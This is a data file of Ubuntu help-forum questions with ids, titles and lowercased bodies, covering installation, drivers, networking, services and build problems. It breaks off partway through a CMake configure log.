319774	when might we expect a 32 gb image for the nexus 7 ?	i was very impressed with the functionality of raring with lxde on the nexus 7 -- - i was able to run the same applications as on my laptop but with significantly better battery life . i did some experimenting with unity on an ongoing basis , but spent most of my time using lxde ( where i managed to achieve stable operation ) . the only major problem was space - although the nexus 7 i have is a 32 gb version , the only installation image i could find was for an 8 gb install , leaving only a few hundred mb for development . this storage capacity is not quite enough for me to work with and as a result , the nexus 7 is gathering dust until i can find a larger image . if a 32 gb image were available again then there might end up being a large number of users out there and i would be one of them . when might we expect a 32 gb image of ubuntu for the nexus 7 ? thanks for the great work ! - chris
319778	ubuntu graphics issue on vmware	i installed ubuntu 13.04 on vmware workstation . all is good , except that there 's this graphics issue with the launcher and the top bar ; the buttons do work , however . i downloaded ccsm for a try , but could n't go further with any of the options . could anyone help please ? this is an inspiron 1525 with intel graphics . thanks
319781	choosing the os when dualbooting	i 've just finished installing ubuntu , and now have ubuntu in one partition and windows 8 in another . i was under the impression that when my computer starts , i would be able to choose from a menu which one to run . however , what happens instead is that ubuntu runs automatically if i do n't press anything , or if i press escape i get a menu which includes only ubuntu and something called memtest - no windows . how am i supposed to run windows ? please avoid too much technical language and give me step by step instructions wherever possible .
319783	i ca n't upgrade from ubuntu11.10 to 12.04	when i try to upgrade the system , it always failed . w : 无法下载 http : //cn.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages 404 not found , w : 无法下载 gzip : /var/lib/apt/lists/partial/cn.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en encountered a section with no package : header , e : some index files failed to download . they have been ignored , or old ones used instead . what should i do ?
319785	using my amd radeon™ hd 8750m graphics in 13.04	i have been trying to get my dedicated graphics ( amd radeon™ hd 8750m graphics ) working on my samsung series 5 laptop . it just shows intel® ivybridge mobile in the system details and gaming performance is much worse on the integrated card . both fglrx and fglrx-updates broke unity completely . i do n't mind using open source amd drivers as long as i can activate my dedicated card ( and preferably be able to switch to it only when gaming either manually or automatically ) . how can i activate my dedicated graphics ?
319792	ubuntu does not recognize existing windows partitions in a gpt disk	i just built a new computer and installed a clean copy of windows 7 home premium ( 64-bit ) on it . other than verifying that the windows install completed successfully , i have done absolutely nothing else to the computer . i now want to install ubuntu 13.04 on the same machine in a dual-boot setup . however , the ubuntu installer starts out by giving me the message this computer currently has no detected operating systems . followed by the single option erase disk and install ubuntu i expected it to say that it detected an existing windows 7 installation and ask me if i wanted to get rid of it or keep it as a dual-boot . i 've checked out a few existing au questions on this topic ( ubuntu 13.04 not detecting windows 7 during install ; `` this computer currently has no detected operating systems '' when installing ; ubuntu 12.10 install do n't recognize windows 7 ; ubuntu 12.04 installer does not see windows already installed on my computer ) and they all seem to lead to the same two conclusions : use fixparts use gparted when i tried to use fixparts , the system told me it was the wrong tool , with the output $ sudo fixparts /dev/sda fixparts 0.8.7 loading mbr data from /dev/sda this disk appears to be a gpt disk . use gnu parted or gpt fdisk on it ! exiting ! i think gparted is a non-option for me because i want to dual-boot and — to the best of my understanding — it would wipe out the win7 install . however , i did open it up just for inspection purposes . here 's a screenshot of everything i did : for what it 's worth , the hard drive itself does n't seem to be corrupted ; i can open it up in ubuntu and see all the windows files and directories there that i expect . ( it 's the middle right window in the screenshot . ) what else can i do here to get ubuntu to install side-by-side with windows ?
319798	how do i intall a network manager on ubuntu ?	i uninstalled my network manager trying to fix a problem . now i have no network manager and therefore no internet . so i need one and i need to install it ?
319799	unable to load drivers for wireless card or nvidia card in 12.04	i 've looked through countless posts and tried several suggested lines of code for the terminal . i have a dell precision m50 i 've installed ubuntu 12.04 on . when i first installed , the display was pixelated and `` broken '' up looking . i played around with several post suggestions trying to get the nvidia drivers loaded . my display looks better , but i only have 800x600 resolution now . i 'm also trying to install a linksys wpc54g v2 pcmcia card because the internal wifi card is n't capable of anything but wep . i 'm not great with linux , and i 've tried everything i can find or think of . if anybody could help , i 'd appreciate it .
319800	new install and no internet connection	i have an old dell laptop ( inspiron 6400 ) that i thought i would use ubuntu 13.04 on . i get no internet connect at all after i installed . wired or wireless . i am mainly just trying to get the wired connection to work first . here is the output for the ifconfig lo link encap : local loopback inet addr : 127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up lookback running mtu:65536 metric:1 rx packets:104 errors:0 dropped:0 overruns:0 frame:0 tx packets:104 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9038 ( 9.0 kb ) tx bytes:9038 ( 9.0 kb ) i went into the /etc/network/interfaces file and added the lines auto eth0 iface eth0 inet dhcp i still get no internet after a reboot . if i boot from the cd and use the try ubuntu option i then have internet . here is the output for the ifconfig from the cd boot . eth0 link encap : ethernet hwaddr : 00:19 : b6:84:7c:5b inet addr:192.168.1.21 bcast:192.168.1.255 mask:255:255:255:0 inet6 addr : fe80 : :219 : b9ff : fe84:7c5b/64 : scope : link up broadast running multicast mtu:1500 mertic:1 rx packets:1135 errors:0 dropped:0 overruns:0 frame:0 tx packets:918 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1029206 ( 1.0mb ) tx bytes:119225 ( 119.2 kb ) interrupt:17 lo link encap : local loopback inet addr : 127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up lookback running mtu:65536 metric:1 rx packets:198 errors:0 dropped:0 overruns:0 frame:0 tx packets:198 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:22577 ( 22.5 kb ) tx bytes:22577 ( 22.5 kb ) i could use some help getting the install package to work correctly
319805	is it safe to clone the current used disk	i have a hard drive i am using and i need to clone it , but i can not turn the computer off to take the hdd out . i want to know how safe it is to clone a disk that is being used at the moment it is being cloned . what problems could i have the cloned copy ? what problems could i have with the original disk ? what alternatives can i use ( if available ) to clone a working ( in use ) disk ?
319807	how can i update tor browser ?	i downloaded the tor browser and when i ran it , i get that it need to be updated . so i when to the tor website and downloaded the tor bundle and extracted it . when i double click on start-tor-browser it only opened the text file and would n't run tor . even when i opened up the tor browser it still said it needed an update . i used to run it on ubuntu 12.04 , but since i upgraded to 13.04 it would n't . is their a command i can use in terminal to start tor or how can i update the tor browser ?
319814	upstart creates two processes instead of one	i 'm trying to create a simple echo-service using ubuntu upstart . for some reason upstart behaves really strange . when it starts the echo server first time everything is ok , but when it starts it second , third , etc time it creates two processes . it 's not fork and it 's not daemon . please have a look at an example below . i have read almost all upstart documentation and do n't understand what it means . i would appreciate for any help . root @ z-server : ~ # cat /etc/init/echoservice.conf exec ncat -l 7 -k -e `` /bin/cat '' root @ z-server : ~ # root @ z-server : ~ # root @ z-server : ~ # start echoservice echoservice start/running , process 1383 root @ z-server : ~ # root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root 1383 0.0 0.0 17348 1328 ? ss 22:11 0:00 ncat -l 7 -k -e /bin/cat root @ z-server : ~ # root @ z-server : ~ # stop echoservice echoservice stop/waiting root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root @ z-server : ~ # root @ z-server : ~ # start echoservice echoservice start/running , process 1401 root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root 1401 0.0 0.0 4440 624 ? ss 22:12 0:00 /bin/sh -e -c ncat -l 7 -k -e `` /bin/cat '' /bin/sh root 1402 0.0 0.0 17348 1324 ? s 22:12 0:00 ncat -l 7 -k -e /bin/cat root @ z-server : ~ # root @ z-server : ~ # root @ z-server : ~ # stop echoservice echoservice stop/waiting root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root @ z-server : ~ # root @ z-server : ~ # start echoservice echoservice start/running , process 1411 root @ z-server : ~ # root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root 1411 0.0 0.0 4440 628 ? ss 22:12 0:00 /bin/sh -e -c ncat -l 7 -k -e `` /bin/cat '' /bin/sh root 1412 0.0 0.0 17348 1324 ? s 22:12 0:00 ncat -l 7 -k -e /bin/cat root @ z-server : ~ # root @ z-server : ~ # kill -9 1411 root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root 1412 0.0 0.0 17348 1324 ? s 22:12 0:00 ncat -l 7 -k -e /bin/cat root @ z-server : ~ # root @ z-server : ~ # initctl status echoservice echoservice stop/waiting root @ z-server : ~ # root @ z-server : ~ # start echoservice echoservice start/running , process 1421 root @ z-server : ~ # root @ z-server : ~ # ps aux | grep -v grep | grep -i ncat root 1412 0.0 0.0 17348 1324 ? s 22:12 0:00 ncat -l 7 -k -e /bin/cat root @ z-server : ~ #
319817	what does `` open a console/terminal '' mean ?	i want to install a file and the instructions say `` open a console/terminal '' , then `` and cd to the location where the installer was downloaded '' . what does this mean in plain english ? it seems one has to be a computer geek to do the simplest thing in linux !
319818	wi-fi is active in monitored , but wi-fi lamp indicator is n't turned on	wi-fi is active in screen monitored , but wi-fi lamp indicator in my laptop is n't turned on ( should turned on ) . can solve this ?
319822	how do i make a server that will backup computers over the internet ?	i need to know how to make a ubuntu server that will backup all the files on about 4 computers that are both pc and mac , i have the proper hardware , but i do n't know where to start with the backup system . any ideas or help ?
319825	installing kubuntu	i want to install kubuntu ( not sure if i should keep windows 8 alongside or just delete it considering i do n't have any info on it anyway ) so when i 'm at the partitioning stage it asks me about lvm and encrypted lvm , what do they mean and which should i choose ? i could n't really find any detailed answers regarding lvm on the net . thanks .
319826	how to install adobe master collection cs6 in ubuntu 12.10	i have dell inspiron 1545 laptop with windows 7 installed on it.also i have installed ubuntu 12.10 on a separate drive.i want to install adobe master collection cs6 on ubuntu 12.10.i tried using wine but what wine does is , it just installs the software & does n't allow me to use it.while i click on any adobe product say adobe photoshop & hit enter to run it it pops out an error message . how should i tackle this ? is there any other software apart from virtual machine ware or wine to install & successfully run adobe master collection cs6 in ubuntu 12.10 ?
319838	failed to set interface wlan0 into ap mode : intel centrino n1000 wireless	i am a new ubuntu user and have installed ubuntu 12.04 lts on my acer aspire one d255 netbook with an intel centrino n1000 wireless card . all i want is to set my netbook as wifi hotspot for my android devices . this worked well for me in windows 7 using connectify but i am trying to make hotspot in ubuntu using hostapd ( http : //nims11.wordpress.com/2012/04/27/hostapd-the-linux-way-to-create-virtual-wifi-access-point/comment-page-5/ ) but getting following error : ali @ ali-aod255 : ~ $ sudo hostapd ~/hostapd-test.conf configuration file : /home/ali/hostapd-test.conf nl80211 : failed to set interface wlan0 into ap mode nl80211 driver initialization failed . eloop : remaining socket : sock=4 eloop_data=0x8178910 user_data=0x8178e80 handler=0x807c5e0 eloop : remaining socket : sock=6 eloop_data=0x817ac98 user_data= ( nil ) handler=0x8086770 all i want is to setup a wifi hotspot using my netbook so that my android devices can view and connect to it .
319839	online payment safe in ubuntu 13.04	i would just like to know that is ubuntu and other linux distributions safe for online payments ? ? the latest versions . generally most people want web safety . people say that ubuntu is very secure so is it safe for online transactions or is there a catch involved ?
319843	i ca n't use the terminal while gedit command is running	i recently installed 12.04 . when i try to edit a file with gedit , i ca n't use the terminal until i close the editing file or i have to open a new terminal . but i think i did n't have this problem with 11.04 , however i 'm not sure . is there anyway to avoid this and to use same terminal while editing files .
319844	reboot from terminal waiting running apps to quit	sometimes ( ~once in a month ) , my ubuntu wo n't wake up from sleep correctly ( it just shows black screen instead of asking for password ) . in these situations i go to first terminal ( ctrl+alt+f1 ) and do `` sudo reboot now '' ( or `` sudo reboot '' ) . but sudo reboot immediately reboots the system , without waiting firefox to exit . is there a way to wait until software will quit nicely , waiting at least 10-20 seconds ? thanks !
319848	how to change the password and software of a cracked version of ubuntu12.04 ?	i have a school laptop which has ubuntu version 12.04 which is not the real version . in that we go to terminal and ask for to download something then the will ask for the password.is there another way to change the password and the software.the wifi which we use wont let us access anything.it is all blocked.so i need some help to change the password
319855	when i try to reset my password using root i could n't type	when i try to reset my password from the root menu using the passwd command , it says `` type new unix password '' , but i ca n't type . please help !
319865	how to launch guitar pro 6	i thought i would give this one more go , i recently downloaded the full linux demo version of guitar pro 6 ( r11201 ) . when i first tried to install with ubuntu software centre , i just got `` error '' and it failed to install . i tried to install it ( with a lot of help from you guy 's ) using terminal but could not get it to install . someone on the forum suggested i just double click the file to install , i had already tried to do this as mentioned above , but gave it a go . after several attempts it finally installed.yah.so now i need to know how to launch it . i have extracted the files so does anybody know the easiest , most successful way to solve this problem ?
319871	bluetooth speaker : preferred mode `` high fidelity playback '' ( a2dp ) is not getting saved	i have a bluetooth speaker , sony srs-btx300 , which works in linux/ubuntu 13.04 , but only after some fiddling . ( update dec 2013 : same problems remain in 13.10 ) i have to set the preferred bandwidth mode to `` high fidelity playback '' ( a2dp ) each time after switching on the computer and reconnecting the speaker . the mode resets itself to `` telephony/duplex '' ( =low bandwidth ) every time . it takes about 20 clicks to reset the speaker , ( click through menu , disconnect , reconnects , select mode , test ) , and these are definitely too many clicks . how can i make `` a2dp '' mode the default mode , an do so in a persistent manner ? a few screen shots will illustrate . after choosing this menu by clicking on the bluetooth icon in the top panel in unity ... after setting up this ... ... the preferred mode will be reset to this after restarting/suspending the computer
319876	hard disk doesnt show up after a failed ubuntu minimal installation !	i had windows 8 & i downloaded ubuntu minimal , burned to dvd and booted and started the installation and gone through partition and all those things and while setup was downloading installation files light went off and i have to stop the setup then rebooted and nothing happens windows 8 vanished and no hard disk is detected ! ! any help please
319877	how to distribute internet speed in hotspot ?	i use ubuntu 13.04 and use internet from broadband isp.i make my ubuntu pc hotspot and share internet with two of my friends . but the problem is when one of is downloading rest two of us ai n't getting any speed . is there any way to share speed equally ?
319879	how do i install archiva as a package ( apt-get ) ?	is it possible to install archiva on ubuntu using apt-get command ? i 'd like to install the latest stable version . is there any ubuntu repository for archiva ?
319880	wrong windows name in grub bootloader	i have a duel boot pc which runs linux and windows 7 . i not sure if this is windows or linux fault but the grub ( linux bootloader ) give me option to either boot to linux or to windows 8 which is n't right . however if i select windows 8 it will boot to windows 7 correctly . i did used to have windows 8 on my pc last year as a duel boot to windows 7 ( no linux was on the pc ) but i have wiped it but it seems that there is still bit of windows 8 bootloader code lying somewhere around . i have tried bootrec many times but it does n't change the name . i did try wipe grub again and install it but it still saying windows 8 . please could anyone help ? : ) thanks
319881	how do i get add-apt-repository to work through a proxy passwd protected network ?	i am trying to install ubuntu sdk but when i enter this command : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk i got an ppa error to check internet connection . so to over come this problem , i used these commands export http_proxy=htt : //username : passwd @ proxyserver.net : port/export sudo su add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk but now i am getting this error : no passwd entry for user 'add-apt-repository please help me out , as i really want to work on this sdk as i want to do something in open source world and want to develop something . thanks !
319882	problem in .bashrc	i try to edit .bashrc to view the c-compilers that i installed before . but after opening the new terminal i am stuck with strange error . i am unable to ls the files/directories and nothing works . it hangs with the following error message on command line : vi .bashrc command `vi` is available in /usr/bin/vi the command could not be located because /usr/bin is not included in the path environment variable . vi : command not found can anyone please assist me ?
319884	running make on makehuman results in the following fatal error : python.h : no such file or directory	i have ubuntu 13.04 installed on my machine and have python-dev and python3.3-dev both installed . i downloaded makehuman v1.0 alpha 7 which requires to make the package . when running make i encounter the following error : ~/programs/makehuman $ make compiling c file src/core.c to src/core.o ... src/core.c:35:20 : fatal error : python.h : no such file or directory compilation terminated . make : *** [ src/core.o ] error 1 as requested , i checked if python.h exists : ~/programs/makehuman $ ls -l /usr/include/python2.7/python.h -rw-r -- r -- 1 root root 4329 apr 19 21:20 /usr/include/python2.7/python.h anything i might have missed ?
319892	setting up ubuntu and windows 7 dual boot with preinstalled windows 7 without windows cd	i do n't have the windows cd with me , and i do n't mind making and using the ubuntu cd , but windows 7 is already installed on my computer . now i want to get ubuntu so that i can have the ubuntu + windows 7 dual boot option on boot . what should i do ? does unetbootin fulfill my needs ? if i must have a windows 7 cd , what kind of cd do i need to make ?
319901	virtualbox is n't locked when ubuntu is locked	i have win7 in my virtualbox 4.2.10 in my ubuntu 13.04 x86_64 . my ubuntu is locked in 5 minutes but i can still use win7 when win7 is set fullscreen . i can unlock the ubuntu only after i close or minimize the win7 . is it a bug ?
319903	how do i find the password to a hard drive partition ?	i am running lubuntu 13.04 and i have a problem with a partition on my external drive . basically , i either do not remember the password or some sort of error is not allowing my access the partition . my questions are actually two : how can i find the password to a drive partition if i forgot it ? please refer to the image attached , i am getting that error when i try and use the password , and i am wondering whether i actually forgot the password or there is some other problem . thanks beforehand for any assistance given .
319904	how to control pen tablet pressure input with a joystick ?	) i have a pen tablet genius g-pen f610 and its working perfectly in ubuntu 12.04 but for drawing purpuses i need to block pen pressure input ( which is easy to do mechanicly just by removing the plastic tip of the pen ) and then somehow to control the presure by gamepad or joystick , for example the more i move the joystick to the left the more pressure is detected ( by drawing software ) to be coming from the pen the result should be that i am still drawing lines with the pen but the thickness of the line is controlled by joystick thanks for all suggestions
319908	php version in apt - does it correspond to version on php.net and if not how to upgrade to latest release	so i 'm setting up a lamp web server based on ubuntu 13.04 raring . i 've installed all required software and run apt-get update and upgrade . when i run php info it reports php version 5.4.9-4ubuntu or something similar . does this correspond to the release 5.4.9 on the php.net site . if so what is the best way to update to the latest 5.4 or 5.5 minor release ? i previously tried installing from source but this only updated the command line version of php . apache was still reporting the same release .
319910	creating a file with some content in shell scripting	i 'm a little new to shell scripting and i want to create a new file inside the script and want to add content and then close it . it should not take the arguments from the user . everything from the path and content is predefined . was it possible ?
319911	ubuntu 13.04 - graphic freeze	my ubuntu will not boot . it is a fresh install on the pc from a live usb . no errors were reported during install . when booting from the freshly installed ubuntu , the pc freezes before the graphical session is initiated , ie before the login screen . the strange thing is however that the pc boots and behaves normally when starting from the live usb ( `` test ubuntu '' option ) . the boot in safe graphics mode ( from the fresh install ) is successful with the pathetic graphics that go with it unfortunately . i presume therefore that the problem is the graphical ( xserver ? ) configuration that was installed by the ubuntu installer . it must be different somehow from the all purpose graphical configuration from the live usb . my config : ubuntu 13.04 32bit , acer aspire m3100 , amd athlon ( tm ) 64 x2 dual core processor 4400+ ă 2 , 4gb ram , geforce 7300 le/pcie/sse2/3dnow ( ie not working with the on board graphics ) anyone would have ideas at what to test , to look for ? thank you
319914	how do i fix this pulseaudio server crash without rebooting ?	on my ubuntu 12.04 , the audio server encounters occasional crashes , so that i 'm forced to reboot the system in order to have it play audio . alsamixer looks ok , nothing is muted . moreover , i tried sudo pkill -9 pulseaudio and then : pulseaudio -d which gave me e : [ pulseaudio ] main.c : daemon startup failed . can you help me understand what 's wrong ?
319927	how to add path to be used for terminal	i 'm trying to add phpunit to the system path so that i can just use it from any terminal window . i installed phpunit using composer , then i added the following lines on the .bashrc file in the home directory then opened a new terminal but it does n't seem like the terminal recognizes phpunit . any ideas ? path=media/wern/files/tools/vendor/eher/phpunit/bin path=media/wern/files/tools/vendor/bin
319930	is ubuntu more suited for python based apps ?	my question is simple . is ubuntu more optimized for text editor-like programs ( libre office , sublime text , etc . ) written in python or not ? or there is no difference if i use c++ , python or java in ubuntu ? i have noticed that python is somehow favored by ubuntu developers when creating office-like application , catalogues , custom on-demand apps etc . also , ubuntu website promote python here : http : //developer.ubuntu.com/get-started and they do n't promote c++ or java on their website . so , i am curious why they promote python more than c++ or java ? or is it only because the development is faster in python than in java or c++ ? i am not asking which programming language is the best ( i already know that c++ is the best and mostly used when it comes to graphics and hardware optimization ) , but i am just curious why is python so popular in ubunutu community and if it 's just because it 's easy to program in this language or if it has some other reason e.g . better performenc in ubuntu than other languages . what is the history of the ubuntu team decision to promote python as the first language of ubuntu ?
319932	what should i do if ubuntu 13.04 needs to reboot to fully install but wo n't ?	i currently have a mac os x 10.7.5 and used virtualboxvm to install ubuntu 13.04. i went through the whole process and the os is created , but the only problem is it needs to reboot but it stays stuck on the reboot message . it says its a broadcast message from root @ ubuntu..the system is going down for reboot now ! modem manager 1436 caught signal 15 , shutting down..this message just remains and if i try shutting it down with my other os in the background , it restarts and does the same thing when i start ubuntu again . how do i get past this point to fully install ubuntu as my only os ? it gave me 2 options when installing : 1 ) to test ubuntu out before wiping my mac os 2 ) fully install and replace mac with ubuntu . i chose the second . i filled out all username , location and password info . the new os is created , the system needs to reboot now but wo n't like i said . apparently the virtualbox is a cd according to comments below , and to complete the process i need to eject it . how is that done ? ( pressing enter or any other key does not work )
319934	how can i see where ubuntu has been installed on my hdd ?	i have a dual boot pc with windows xp & ubuntu which i recently installed . i ca n't see any of my ubuntu files in xp . where is ubuntu installed on my computer ? while installing ubuntu , i used the default option and allocated 9 gb for it . in xp , one of the drives which was 15 gb in size now shows 8.34 gb as full capacity & 8.28 gb as free space . has ubuntu been installed there ? if so , how can i increase the size of my ubuntu partition from 9 gb to 15 gb ( ubuntu has already been installed ) ? screenshot of gparted :
319938	installation of cmake 2.8.11 on ubuntu 13.04	i tried to install cmake 2.8.11 on ubuntu 13.04 . i got cmake 2.8.11 source and during installing some errors happened . and ubuntu installs cmake 2.8.10 . because of a lot of dependencies i am not able to install manually . please suggest how i can install cmake 2.8.11 on ubuntu 13.04 . i use a open source code , needs cmake 2.8.11 for accurate execution . i tried to install by the following commands : tar -xzvf cmake-2.8.11.2.tar.gz cd cmake-2.8.11.2.tar.gz ./configure make after ./configure : -- checking whether c++ compiler has '__int64 ' - no -- checking for c type size macros -- checking for c type size macros - compiled -- looking for sys/types.h -- check size of __int64 - failed -- checking whether char is signed -- checking whether cxx compiler has _atoi64 - no -- looking for connect in socket ; dl -- looking for connect in socket ; dl - not found -- looking for gethostbyname in c -- looking for gethostbyname in c - found -- looking for recv in network ; dl -- looking for recv in network ; dl - not found -- looking for getch in ws2_32 ; dl -- looking for getch in ws2_32 ; dl - not found -- looking for getch in winmm ; dl -- looking for getch in winmm ; dl - not found -- looking for idna_to_ascii_lz in idn ; dl -- looking for idna_to_ascii_lz in idn ; dl - not found -- looking for dlopen in dl -- looking for dlopen in dl - found -- looking for process.h -- looking for process.h - not found -- looking for features.h -- looking for features.h - found -- looking for include file stdio.h -- looking for 37 include files stdio.h , ... , sys/utime.h - not found -- looking for 37 include files stdio.h , ... , sockio.h -- looking for 37 include files stdio.h , ... , sockio.h - not found -- looking for 37 include files stdio.h , ... , sys/sockio.h -- looking for 37 include files stdio.h , ... , sys/sockio.h - not found -- looking for 37 include files stdio.h , ... , x509.h -- looking for 37 include files stdio.h , ... , x509.h - not found -- looking for 42 include files stdio.h , ... , idn-free.h - not found -- looking for 42 include files stdio.h , ... , idna.h -- looking for 42 include files stdio.h , ... , idna.h - not found -- looking for 42 include files stdio.h , ... , tld.h - not found -- looking for 45 include files stdio.h , ... , sys/filio.h - not found -- check size of __int64 - failed -- looking for stricmp - not found -- looking for strcmpi -- looking for strcmpi - not found -- looking for strncmpi -- looking for strncmpi - not found -- looking for inet_ntoa_r - not found -- looking for closesocket -- looking for closesocket - not found -- looking for getpass_r - not found -- looking for _strtoi64 - not found -- looking for strerror_r -- looking for idn_free - not found -- looking for idna_strerror -- looking for idna_strerror - not found -- looking for tld_strerror -- looking for tld_strerror - not found -- performing curl test have_fionbio - failed -- performing curl test have_ioctlsocket -- performing curl test have_ioctlsocket - failed -- performing curl test have_ioctlsocket_case -- performing curl test have_ioctlsocket_case - failed -- performing curl test have_o_nonblock -- performing curl test have_o_nonblock - success -- performing curl test have_so_nonblock -- performing curl test have_so_nonblock - failed -- performing curl test time_with_sys_time -- performing curl test time_with_sys_time - success -- performing curl test have_o_nonblockhave_gethostbyaddr_r_5 -- performing curl test have_o_nonblockhave_gethostbyaddr_r_5 - failed -- performing curl test have_gethostbyaddr_r_7 -- performing curl test have_gethostbyaddr_r_7 - failed -- performing curl test have_gethostbyaddr_r_8 -- performing curl test have_gethostbyaddr_r_8 - success -- performing curl test have_gethostbyaddr_r_5_reentrant -- performing curl test have_gethostbyaddr_r_5_reentrant - failed -- performing curl test have_gethostbyaddr_r_7_reentrant -- performing curl test have_gethostbyaddr_r_7_reentrant - failed -- performing curl test have_gethostbyaddr_r_8_reentrant -- performing curl test have_gethostbyaddr_r_8_reentrant - success -- performing curl test have_gethostbyname_r_3 -- performing curl test have_gethostbyname_r_3 - failed -- performing curl test have_gethostbyname_r_5 -- performing curl test have_gethostbyname_r_5 - failed -- performing curl test have_gethostbyname_r_6 -- performing curl test have_gethostbyname_r_6 - success -- performing curl test have_gethostbyname_r_3_reentrant -- performing curl test have_gethostbyname_r_3_reentrant - failed -- performing curl test have_gethostbyname_r_5_reentrant -- performing curl test have_gethostbyname_r_5_reentrant - failed -- performing curl test have_gethostbyname_r_6_reentrant -- performing curl test have_inet_ntoa_r_decl - failed -- performing curl test have_inet_ntoa_r_decl_reentrant -- performing curl test have_inet_ntoa_r_decl_reentrant - failed -- check size of curl_off_t - done -- performing test curl_cv_recv -- performing test curl_cv_recv - success -- performing test int recv ( int , void * , size_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , void * , size_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , void * , int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , void * , int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , void * , int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , void * , socklen_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , void * , socklen_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , size_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , size_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , size_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , socklen_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , socklen_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , unsigned int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , unsigned int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( int , char * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( int , char * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , void * , size_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , void * , size_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , void * , size_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , void * , size_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , void * , int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , void * , int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , void * , int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , void * , int , unsigned int ) ( curl_cv_func_recv_test ) - failed failed ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , void * , unsigned int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , void * , unsigned int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , void * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , void * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , char * , size_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , char * , size_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , char * , size_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , char * , int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , char * , int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , char * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , char * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , char * , unsigned int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , char * , unsigned int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( ssize_t , char * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( ssize_t , char * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , size_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , size_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , size_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , size_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , socklen_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , socklen_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv 